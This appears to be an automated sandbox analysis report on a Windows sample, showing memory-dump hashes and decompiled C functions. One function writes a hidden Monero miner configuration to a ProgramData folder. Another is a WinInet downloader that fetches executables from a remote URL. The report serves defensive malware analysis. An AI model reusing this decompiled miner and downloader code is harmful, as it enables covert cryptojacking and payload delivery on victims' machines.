Memory Dump Source

Source File: 00000004.00000002.801565652.0000000000DBD000.00000040.00000001.sdmp, Offset: 00DBD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction ID: a439751597d52ab4007b8aebb78f76098a9914a5b229a7bcf041688a3d771e6c
Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction Fuzzy Hash: 5911E676504280CFCF11CF10D5C4B5ABFB2FB89324F28C6A9D8450B656C33AD856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801589520.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
Instruction ID: 85743d8e8988ec1dee68a2864dc3b35b3350aee669707b523d8adf393a60a234
Opcode Fuzzy Hash: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
Instruction Fuzzy Hash: 17119D76904280DFCB11CF10D9C4B15FBB2FB85324F28C6AED8494B656C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD2B7, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801589520.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c290966d431b771c232c848e2df3a4f71e4c0d9c3d497cbce964f844d3499f65
Instruction ID: 350d6d5c9ebc56a68e7db62f1d06e40bfe2ab32313e126d326b390067834a871
Opcode Fuzzy Hash: c290966d431b771c232c848e2df3a4f71e4c0d9c3d497cbce964f844d3499f65
Instruction Fuzzy Hash: 0D11A776504684DFD711CF14D9C4B19FB72FB85324F28C66ED84547646C339D84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FAE558, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf9958d386052c957f254c90faaf48f40ba3bed5a6a88ea541c1f89fbc97633
Instruction ID: 5a8b45af4895231a13d2dc1b95e3c6ba70e02d1755df2694aa5e77cc02f3b5b7
Opcode Fuzzy Hash: eaf9958d386052c957f254c90faaf48f40ba3bed5a6a88ea541c1f89fbc97633
Instruction Fuzzy Hash: D212C2F9C917468AE310CF6DECD81893BA1B744328BD24A08D2616BAD5D7BC157ECF84

Uniqueness

Uniqueness Score: -1.00%

Function 00FAC114, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77661ebdede96f7b0c36c10bde5db2932dbbdbe07817b4dfc460cab869b5a3b4
Instruction ID: e405fc162460fbc6cc3c55179a6849ee542599b8d0b276eee6ecd6dfcc4156d2
Opcode Fuzzy Hash: 77661ebdede96f7b0c36c10bde5db2932dbbdbe07817b4dfc460cab869b5a3b4
Instruction Fuzzy Hash: A2A18E76E0020A8FCF05DFA5C8445DEB7F2FF86300B15856AE906BB261EB35AD15DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FAE548, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c972fe18f5913610aeb260f14fb2e5b1f155f82dc2cf3bede73f5fa39f3006a
Instruction ID: 0859573bbd710b6a941f1374e076b5a1d1c1a8925e37ecf94870df86ad7aa5b7
Opcode Fuzzy Hash: 7c972fe18f5913610aeb260f14fb2e5b1f155f82dc2cf3bede73f5fa39f3006a
Instruction Fuzzy Hash: 25C118F9C917468AD310CF68ECC81897BA1BB85328FD24B08D2616BAD5D7BC157ACF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tmp70CEtmp.exe PID: 3496 Parent PID: 1808 tmp70CEtmp.exeCOMMON

Executed Functions

Function 00403CA0, Relevance: 151.0, APIs: 7, Strings: 79, Instructions: 511
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00403CA0(char* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				long _v28;
				void* _v32;
				long _v36;
				long _v40;
				intOrPtr _v44;
				char* _v48;
				long _v52;
				void* _v56;
				long _v60;
				void* _v64;
				long _v68;
				long _v72;
				struct _SYSTEM_INFO _v108;
				char _v2156;
				char _v2676;
				void* _t129;
				char* _t132;
				signed int _t137;
				void* _t139;
				long _t150;
				char* _t282;
				char* _t284;
				void* _t321;
				void* _t323;
				void* _t334;
				void* _t336;

				_t334 = __edx;
				_t331 = __ecx;
				_t129 =  *0x5d2df0; // 0x31c
				_t336 = _a4;
				if(_t336 == 0) {
					_t129 =  *0x5d2124; // 0x3f4
				}
				if(_t129 != 0 && _t129 != 0xffffffff) {
					NtClose(_t129);
				}
				E00401A00( &_v2676, "C:\ProgramData\LKBNMTFJgl");
				_t132 =  &_v2676;
				if(_t336 == 0) {
					_push(L"\\cfg");
				} else {
					_push(L"\\cfgi");
				}
				_push(_t132);
				E00401970();
				E00401BB0( &_v2156, 0, 0x800);
				_a4 = 0;
				_v56 = 0;
				asm("xorps xmm0, xmm0");
				_v36 = 0;
				asm("movups [ebp-0x30], xmm0");
				_v32 = 0;
				_v28 = 0;
				_v64 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				GetSystemInfo( &_v108); // executed
				if(_t336 != 0) {
					_t137 = _v108.dwNumberOfProcessors;
					if( *0x5d130c != 1) {
						goto L11;
					} else {
						if(_t137 >= 1) {
							goto L17;
						} else {
							_t139 = 1;
						}
					}
					goto L18;
				} else {
					if( *0x5d1308 != 2) {
						E004017E0( &_v12, "1");
					} else {
						_t137 = _v108.dwNumberOfProcessors;
						L11:
						asm("cdq");
						_t137 = _t137 - _t334 >> 1;
						if(_t137 >= 1) {
							L17:
							_t139 =  >  ? 0xff : _t137;
						} else {
							_t139 = 1;
						}
						L18:
						_t331 =  &_v12;
						E00401550(_t139,  &_v12);
					}
				}
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				_push(0);
				_push(0);
				_push( &_v20);
				_push( &_v2676);
				if( *0x5d10b8() != 1) {
					L29:
					return 0; // executed
				} else {
					_v56 = 0x18;
					_v48 =  &_v20;
					_v52 = 0;
					_v44 = 0x40;
					_v40 = 0;
					_v36 = 0;
					_t150 = NtCreateFile( &_a4, 0x120116,  &_v56,  &_v32,  &_v64, 0x80, 0, 0, 0x60, 0, 0); // executed
					if(_t150 != 0) {
						goto L29;
					} else {
						E004017E0( &_v2156, "{\r\n\t\"api\": {");
						E004016E0( &_v2156, "\r\n\t\t\"id\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"worker-id\": null");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"http\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": false");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"autosave\": false,");
						E004016E0( &_v2156, "\r\n\t\"version\": 1,");
						E004016E0( &_v2156, "\r\n\t\"background\": false,");
						E004016E0( &_v2156, "\r\n\t\"colors\": true,");
						E004016E0( &_v2156, "\r\n\t\"randomx\": {");
						E004016E0( &_v2156, "\r\n\t\t\"init\": 1,");
						E004016E0( &_v2156, "\r\n\t\t\"numa\": true");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"cpu\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"huge-pages\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"hw-aes\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"priority\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"memory-pool\": false,");
						E004016E0( &_v2156, "\r\n\t\t\"asm\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"argon2-impl\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"cpu-profile\": {");
						E004016E0( &_v2156, "\r\n\t\t\t\"threads\": ");
						E004016E0( &_v2156,  &_v12);
						E004016E0( &_v2156, "\r\n\t\t},");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/xhv\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/tube\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/1\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/r\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/fast\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-gpu\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/half\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/2\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/chukwa\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/wrkz\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/loki\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/wow\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/arq\": \"cpu-profile\"");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"donate-level\": ");
						E004016E0( &_v2156, "0");
						E004016E0( &_v2156, ",");
						E004016E0( &_v2156, "\r\n\t\"donate-over-proxy\": 0,");
						E004016E0( &_v2156, "\r\n\t\"log-file\": null,");
						E004016E0( &_v2156, "\r\n\t\"pools\": [");
						E004016E0( &_v2156, "\r\n\t\t{");
						E004016E0( &_v2156, "\r\n\t\t\t\"algo\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"coin\": \"monero\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"url\": \"");
						E004016E0( &_v2156, _a8);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"user\": \"");
						E004016E0( &_v2156, _a12);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"pass\": \"");
						E004016E0( &_v2156, _a16);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"rig-id\": null,");
						_t282 =  &_v2156;
						if(_a20 == 0) {
							_push("\r\n\t\t\t\"nicehash\": false,");
						} else {
							_push("\r\n\t\t\t\"nicehash\": true,");
						}
						_push(_t282);
						E004016E0();
						_t284 =  &_v2156;
						if( *0x5d1c24 == 0) {
							_push("\r\n\t\t\t\"keepalive\": false,");
						} else {
							_push("\r\n\t\t\t\"keepalive\": true,");
						}
						E004016E0();
						E004016E0( &_v2156, "\r\n\t\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls-fingerprint\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"daemon\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"self-select\": null");
						E004016E0( &_v2156, "\r\n\t\t}");
						E004016E0( &_v2156, "\r\n\t],");
						E004016E0( &_v2156, "\r\n\t\"print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"health-print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"retries\": 5,");
						E004016E0( &_v2156, "\r\n\t\"retry-pause\": 5,");
						E004016E0( &_v2156, "\r\n\t\"syslog\": false,");
						E004016E0( &_v2156, "\r\n\t\"user-agent\": null,");
						E004016E0( &_v2156, "\r\n\t\"watch\": false");
						E004016E0( &_v2156, "\r\n}");
						_t321 = E004088D0(_t331,  &_v2156, E00401850( &_v2156) + 1,  &_v24);
						_t323 =  *0x5d10c0(_a4, 0, 0, 0,  &_v32, _t321, _v24,  &_v72, 0, _t284); // executed
						_push(_a4);
						if(_t323 == 0) {
							NtClose(); // executed
							_push(_v16);
							E00403720(_t334, _t336, _v20); // executed
							return 1;
						} else {
							NtClose();
							goto L29;
						}
					}
				}
			}

0x00403ca0
0x00403ca0
0x00403ca3
0x00403caf
0x00403cb4
0x00403cb6
0x00403cb6
0x00403cbd
0x00403cc5
0x00403cc5
0x00403cd7
0x00403cdf
0x00403ce7
0x00403cf0
0x00403ce9
0x00403ce9
0x00403ce9
0x00403cf5
0x00403cf6
0x00403d0c
0x00403d14
0x00403d1e
0x00403d25
0x00403d28
0x00403d2f
0x00403d34
0x00403d3b
0x00403d42
0x00403d49
0x00403d50
0x00403d57
0x00403d5e
0x00403d66
0x00403d9c
0x00403d9f
0x00000000
0x00403da1
0x00403da4
0x00000000
0x00403da6
0x00403da6
0x00403da6
0x00403da4
0x00000000
0x00403d68
0x00403d6f
0x00403d8e
0x00403d71
0x00403d71
0x00403d74
0x00403d74
0x00403d77
0x00403d7c
0x00403dad
0x00403db7
0x00403d7e
0x00403d7e
0x00403d7e
0x00403dba
0x00403dba
0x00403dbf
0x00403dbf
0x00403d6f
0x00403dca
0x00403dcd
0x00403dd2
0x00403dd4
0x00403dd6
0x00403ddd
0x00403de6
0x00404444
0x0040444a
0x00403dec
0x00403dfe
0x00403e05
0x00403e0f
0x00403e1a
0x00403e2a
0x00403e32
0x00403e39
0x00403e41
0x00000000
0x00403e47
0x00403e53
0x00403e64
0x00403e75
0x00403e86
0x00403e97
0x00403ea8
0x00403eb9
0x00403eca
0x00403ede
0x00403eef
0x00403f00
0x00403f11
0x00403f22
0x00403f33
0x00403f44
0x00403f55
0x00403f69
0x00403f7a
0x00403f8b
0x00403f9c
0x00403fad
0x00403fbe
0x00403fcf
0x00403fe0
0x00403ff4
0x00404004
0x00404015
0x00404026
0x00404037
0x00404048
0x00404059
0x0040406a
0x0040407e
0x0040408f
0x004040a0
0x004040b1
0x004040c2
0x004040d3
0x004040e4
0x004040f5
0x00404109
0x0040411a
0x0040412b
0x0040413c
0x0040414d
0x0040415e
0x0040416f
0x00404180
0x00404194
0x004041a5
0x004041b6
0x004041c7
0x004041d8
0x004041e9
0x004041fa
0x0040420b
0x0040421d
0x0040422e
0x0040423f
0x0040424e
0x0040425f
0x00404270
0x0040427f
0x00404290
0x004042a4
0x004042ac
0x004042b6
0x004042bf
0x004042b8
0x004042b8
0x004042b8
0x004042c4
0x004042c5
0x004042cd
0x004042da
0x004042e3
0x004042dc
0x004042dc
0x004042dc
0x004042e9
0x004042fd
0x0040430e
0x0040431f
0x00404330
0x00404341
0x00404352
0x00404363
0x00404374
0x00404388
0x00404399
0x004043aa
0x004043bb
0x004043cc
0x004043dd
0x004043ee
0x00404412
0x00404431
0x00404437
0x0040443c
0x0040444b
0x00404451
0x00404458
0x00404469
0x0040443e
0x0040443e
0x00000000
0x0040443e
0x0040443c
0x00403e41

APIs

NtClose.NTDLL(0000031C), ref: 00403CC5
GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 00403D5E
RtlDosPathNameToNtPathName_U.NTDLL(?,00000001,00000000,00000000), ref: 00403DDE
NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403E39
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00404821,00000000,00000000), ref: 00404431
NtClose.NTDLL(00000000), ref: 0040443E
NtClose.NTDLL(00000000), ref: 0040444B

Strings

"keepalive": false,, xrefs: 004042E3
"enabled": true,, xrefs: 004042F7
"donate-level": , xrefs: 00404169
"cn-heavy/xhv": "cpu-profile",, xrefs: 00404031
"id": null,, xrefs: 00403E5E
"version": 1,, xrefs: 00403ED8
"rx": "cpu-profile",, xrefs: 00404103
"tls-fingerprint": null,, xrefs: 00404319
"cpu-profile": {, xrefs: 00403FDA
},, xrefs: 00403E80
"huge-pages": true,, xrefs: 00403F74
{"api": {, xrefs: 00403E4D
"argon2-impl": null,, xrefs: 00403FC9
"pass": ", xrefs: 0040426A
\cfgi, xrefs: 00403CE9
"init": 1,, xrefs: 00403F1C
"cn-gpu": "cpu-profile",, xrefs: 004040AB
}, xrefs: 004043E8
},, xrefs: 00403F3E
"cn-heavy/0": "cpu-profile",, xrefs: 00404020
"colors": true,, xrefs: 00403EFA
"http": {, xrefs: 00403E91
}, xrefs: 0040434C
"retry-pause": 5,, xrefs: 004043A4
"cn-heavy/tube": "cpu-profile",, xrefs: 00404042
"pools": [, xrefs: 004041C1
},, xrefs: 00404158
"enabled": false, xrefs: 00403EA2
"rx/0": "cpu-profile",, xrefs: 00404114
"priority": null,, xrefs: 00403F90
C:\ProgramData\LKBNMTFJgl, xrefs: 00403CD1
\cfg, xrefs: 00403CF0
"daemon": false,, xrefs: 0040432A
"randomx": {, xrefs: 00403F0B
"nicehash": true,, xrefs: 004042B8
"memory-pool": false,, xrefs: 00403FA7
"rx/loki": "cpu-profile",, xrefs: 00404125
"coin": "monero",, xrefs: 004041F4
"argon2/chukwa": "cpu-profile",, xrefs: 004040DE
"rx/wow": "cpu-profile",, xrefs: 00404136
"cn/r": "cpu-profile",, xrefs: 00404089
"argon2/wrkz": "cpu-profile",, xrefs: 004040E9
"tls": false,, xrefs: 00404308
"enabled": true,, xrefs: 00403F63
"health-print-time": 60,, xrefs: 00404382
"log-file": null,, xrefs: 004041B0
],, xrefs: 0040435D
"print-time": 60,, xrefs: 0040436E
"syslog": false,, xrefs: 004043B5
"retries": 5,, xrefs: 00404393
@, xrefs: 00403E1A
"cpu": {, xrefs: 00403F4F
"cn/2": "cpu-profile",, xrefs: 004040CD
"keepalive": true,, xrefs: 004042DC
"numa": true, xrefs: 00403F2D
"hw-aes": null,, xrefs: 00403F85
"watch": false, xrefs: 004043D7
"cn-lite/1": "cpu-profile",, xrefs: 00404064
"self-select": null, xrefs: 0040433B
"background": false,, xrefs: 00403EE9
"threads": , xrefs: 00403FEE
"donate-over-proxy": 0,, xrefs: 0040419F
"url": ", xrefs: 00404205
"cn/fast": "cpu-profile",, xrefs: 0040409A
"rx/arq": "cpu-profile", xrefs: 00404147
"asm": true,, xrefs: 00403FB8
"nicehash": false,, xrefs: 004042BF
"cn/half": "cpu-profile",, xrefs: 004040BC
},, xrefs: 0040400F
"cn-lite/0": "cpu-profile",, xrefs: 00404053
"cn": "cpu-profile",, xrefs: 00404078
"rig-id": null,, xrefs: 0040429E
"user": ", xrefs: 00404233
"user-agent": null,, xrefs: 004043C6
},, xrefs: 00403EB3
"algo": null,, xrefs: 004041E3
{, xrefs: 004041D2
"worker-id": null, xrefs: 00403E6F
"autosave": false,, xrefs: 00403EC4

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$FilePath$CreateInfoNameName_SystemWrite
String ID: "algo": null,$"coin": "monero",$"daemon": false,$"enabled": true,$"keepalive": false,$"keepalive": true,$"nicehash": false,$"nicehash": true,$"pass": "$"rig-id": null,$"self-select": null$"threads": $"tls": false,$"tls-fingerprint": null,$"url": "$"user": "$"argon2-impl": null,$"argon2/chukwa": "cpu-profile",$"argon2/wrkz": "cpu-profile",$"asm": true,$"cn": "cpu-profile",$"cn-gpu": "cpu-profile",$"cn-heavy/0": "cpu-profile",$"cn-heavy/tube": "cpu-profile",$"cn-heavy/xhv": "cpu-profile",$"cn-lite/0": "cpu-profile",$"cn-lite/1": "cpu-profile",$"cn/2": "cpu-profile",$"cn/fast": "cpu-profile",$"cn/half": "cpu-profile",$"cn/r": "cpu-profile",$"cpu-profile": {$"enabled": false$"enabled": true,$"huge-pages": true,$"hw-aes": null,$"id": null,$"init": 1,$"memory-pool": false,$"numa": true$"priority": null,$"rx": "cpu-profile",$"rx/0": "cpu-profile",$"rx/arq": "cpu-profile"$"rx/loki": "cpu-profile",$"rx/wow": "cpu-profile",$"worker-id": null${$}$},$"autosave": false,$"background": false,$"colors": true,$"cpu": {$"donate-level": $"donate-over-proxy": 0,$"health-print-time": 60,$"http": {$"log-file": null,$"pools": [$"print-time": 60,$"randomx": {$"retries": 5,$"retry-pause": 5,$"syslog": false,$"user-agent": null,$"version": 1,$"watch": false$],$},$},$},$},$}$@$C:\ProgramData\LKBNMTFJgl$\cfg$\cfgi${"api": {
API String ID: 3784785972-1821464420
Opcode ID: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
Instruction ID: 0c6b8c97c8f286fc2f2609601cf0158cca0e688ef71c127dda3ca6300913d252
Opcode Fuzzy Hash: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
Instruction Fuzzy Hash: DE020771E5021CA6CB50EEE18C86FCE73ECAB04744F554677B148B21D2DEBEDA848B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404B00, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 266
networkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
				void* _v8;
				void _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t54;
				int _t55;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t71;
				int _t78;
				long _t87;
				char* _t91;
				long _t108;
				void* _t111;
				char* _t118;
				long _t119;
				char* _t123;
				void* _t126;
				void* _t128;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;

				E00401BB0( &_v108, 0, 0x38);
				_t118 = _a4;
				_v24 = 0;
				_t108 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t54 = E00401850(_t118);
				_t136 = _t134 + 0x10;
				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112); // executed
				if(_t55 != 0) {
					_t123 = E004015E0(_v92 + 1);
					E00401BB0(_t123, 0, _v92 + 1);
					E00401640(_t123, _v96, _v92);
					_t137 = _t136 + 0x1c;
					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0); // executed
					_v8 = _t61;
					if(_t61 != 0) {
						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0); // executed
						_v20 = _t62;
						_push(_t123);
						if(_t62 != 0) {
							E00401510();
							E004018D0(_t118, "https://");
							_t138 = _t137 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t66 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0); // executed
							_t126 = _t66;
							_v16 = _t126;
							if(_t126 == 0) {
								L26:
								InternetCloseHandle(_v20);
								InternetCloseHandle(_v8);
								return 0;
							} else {
								_t71 = E004018D0(_t118, "https://");
								_t139 = _t138 + 8;
								if(_t71 == 0) {
									L10:
									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
										goto L25;
									} else {
										_t119 = 0x400;
										_t128 = E004015E0(0x400);
										_t140 = _t139 + 4;
										if(_t128 == 0) {
											_t126 = _v16;
											goto L25;
										} else {
											do {
												_t78 = InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24); // executed
												if(_t78 == 0) {
													if(GetLastError() != 0x7a) {
														E00401510(_t128);
														L23:
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														InternetCloseHandle(_v8);
														return 0;
													} else {
														_t119 = _t119 + 0x400;
														goto L17;
													}
												} else {
													_t87 = _v24;
													if(_t87 == 0) {
														InternetCloseHandle(_v16); // executed
														InternetCloseHandle(_v20);
														_t111 = _v8;
														InternetCloseHandle(_t111);
														_t91 = E004018D0(_t128, ";End");
														if(_t91 != 0) {
															 *_t91 = 0;
															return _t128;
														} else {
															E00401510(_t128);
															InternetCloseHandle(_v16);
															InternetCloseHandle(_v20);
															InternetCloseHandle(_t111);
															return 0;
														}
													} else {
														_t108 = _t108 + _t87;
														goto L17;
													}
												}
												goto L27;
												L17:
												_t128 = E004016A0(_t128, _t119 + _t108);
												_t140 = _t140 + 8;
											} while (_t128 != 0);
											goto L23;
										}
									}
								} else {
									_v12 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
										L25:
										InternetCloseHandle(_t126);
										goto L26;
									} else {
										_v12 = _v12 | 0x00000180;
										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
											goto L25;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E00401510();
							InternetCloseHandle(_v8);
							return 0;
						}
					} else {
						E00401510(_t123);
						return 0;
					}
				} else {
					return _t55;
				}
				L27:
			}

0x00404b10
0x00404b15
0x00404b1e
0x00404b25
0x00404b27
0x00404b2e
0x00404b35
0x00404b3f
0x00404b46
0x00404b4d
0x00404b52
0x00404b57
0x00404b5f
0x00404b75
0x00404b7c
0x00404b88
0x00404b8d
0x00404b9d
0x00404ba3
0x00404ba8
0x00404bcb
0x00404bd1
0x00404bd4
0x00404bd7
0x00404bf4
0x00404c04
0x00404c09
0x00404c0c
0x00404c15
0x00404c21
0x00404c28
0x00404c2b
0x00404c38
0x00404c47
0x00404c52
0x00404c58
0x00404c5a
0x00404c5f
0x00404db8
0x00404dbb
0x00404dca
0x00404dd4
0x00404c65
0x00404c6b
0x00404c70
0x00404c75
0x00404cb8
0x00404cc9
0x00000000
0x00404ccf
0x00404ccf
0x00404cda
0x00404cdc
0x00404ce1
0x00404dad
0x00000000
0x00404ce7
0x00404ce7
0x00404cf3
0x00404cfb
0x00404d11
0x00404d86
0x00404d8e
0x00404d9a
0x00404d9f
0x00404da2
0x00404dac
0x00404d13
0x00404d13
0x00000000
0x00404d13
0x00404cfd
0x00404cfd
0x00404d02
0x00404d31
0x00404d40
0x00404d42
0x00404d46
0x00404d4e
0x00404d58
0x00404d79
0x00404d84
0x00404d5a
0x00404d5b
0x00404d66
0x00404d6b
0x00404d6e
0x00404d78
0x00404d78
0x00404d04
0x00404d04
0x00000000
0x00404d04
0x00404d02
0x00000000
0x00404d19
0x00404d23
0x00404d25
0x00404d28
0x00000000
0x00404d2c
0x00404ce1
0x00404c77
0x00404c7a
0x00404c81
0x00404c94
0x00404db0
0x00404db6
0x00000000
0x00404c9a
0x00404c9a
0x00404cb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cb2
0x00404c94
0x00404c75
0x00404bd9
0x00404bd9
0x00404be5
0x00404bf3
0x00404bf3
0x00404baa
0x00404bab
0x00404bbb
0x00404bbb
0x00404b66
0x00404b66
0x00404b66
0x00000000

APIs

InternetCrackUrlA.WININET(73BCEA30,00000000,?), ref: 00404B57
InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D

Strings

application/zlib, xrefs: 00404C21
<, xrefs: 00404B27
application/applefile, xrefs: 00404C38
application/gzip, xrefs: 00404C2B
;End, xrefs: 00404D48
GET, xrefs: 00404C4A
https://, xrefs: 00404C65
text/*, xrefs: 00404C0C
application/exe, xrefs: 00404C15
https://, xrefs: 00404BF9
WinInetGet/0.1, xrefs: 00404B98

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CrackOpen
String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
API String ID: 1262293563-2187584305
Opcode ID: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
Instruction ID: b075b86cb3f3238e1b45add10c95dfbc6438ce08dd21614d055a406b181498c9
Opcode Fuzzy Hash: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
Instruction Fuzzy Hash: D381B971E002097BEB11ABA1EC45FAF77B8EF84754F100176FA04F62D1D7799D108AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004029E0, Relevance: 37.8, APIs: 25, Instructions: 322
nativememorythreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004029E0(void* __ecx, void* _a4, intOrPtr _a8, void* _a12, long _a16, DWORD* _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
